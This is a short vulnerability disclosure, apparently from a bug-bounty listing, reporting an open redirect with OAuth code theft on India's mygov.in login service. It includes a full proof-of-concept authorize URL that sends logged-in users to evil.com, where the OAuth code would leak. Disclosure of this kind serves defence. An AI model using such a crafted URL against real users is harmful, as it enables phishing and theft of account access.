We reply immediately
Published on Aug. 30, 2020, 6:38 a.m.
Reported on https://auth.mygov.in/
Open Redirection with oauth code stealing in indian government's mygov.in webapp. The URL : https://auth.mygov.in/oauth2/authorize?response_type=code&client_id=MyGovStartUpIndia&redirect_uri=http://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve&scope=user_profile&state=https://evil.com/ will redirect the user of mygov.in to evil.com after that user logs in with correct credentials. This makes the attack more effective because hacker can redirect the real users who has account in mygov.in . And the attacker site will also get access to his profile with the OAuth code.
Bug Type:
SecurityStatus:
Reported On:
Aug. 30, 2020, 6:38 a.m.Submitted:
IndependentlyBrowser Version: 68.0
Operating System: Linux
OS Version: Unknown
Total 1 bugs reported
Total points 320